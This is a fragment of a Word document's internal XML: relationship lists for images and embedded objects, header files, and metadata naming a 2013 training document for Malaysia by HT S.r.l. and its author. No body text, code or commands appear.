Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject114.bin"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject133.bin"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject10.bin"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject28.bin"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject78.bin"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpeg"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject95.bin"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject122.bin"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject57.bin"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.png"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject101.bin"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject2.bin"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject147.bin"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject68.bin"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject83.bin"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject49.bin"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject115.bin"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject148.bin"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.tiff"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject124.bin"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject135.bin"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject11.bin"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject29.bin"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject58.bin"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject96.bin"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject102.bin"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject81.bin"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject108.bin"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject50.bin"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image165.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image193.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject69.bin"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject85.bin"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject36.bin"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject149.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject97.bin"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject12.bin"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject126.bin"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject137.bin"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject30.bin"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject59.bin"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject103.bin"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.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10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header1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header4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.tiff"/></Relationships>
</file>

<file path=word/_rels/header9.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sandro\Documents\RCS\ODM%20-%20Offensive%20Delivery%20Management\3.%20Post-Sales\3.1.%20Trainings\Malaysia%202013-10-07\Training_Malaysia_2013-10-07.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80788-D2C2-41EE-9F1E-8BC95D7D5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Training_Malaysia_2013-10-07.dotx</Template>
  <TotalTime>4487</TotalTime>
  <Pages>1</Pages>
  <Words>13271</Words>
  <Characters>75648</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>630</Lines>
  <Paragraphs>177</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Titolo</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr/>
    </vt:vector>
  </TitlesOfParts>
  <Company>HT S.r.l.</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>88742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Alessandro</dc:creator>
  <cp:lastModifiedBy>Alessandro Scarafile</cp:lastModifiedBy>
  <cp:revision>2441</cp:revision>
  <cp:lastPrinted>2013-11-20T11:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-08-22T08:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-20T11:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>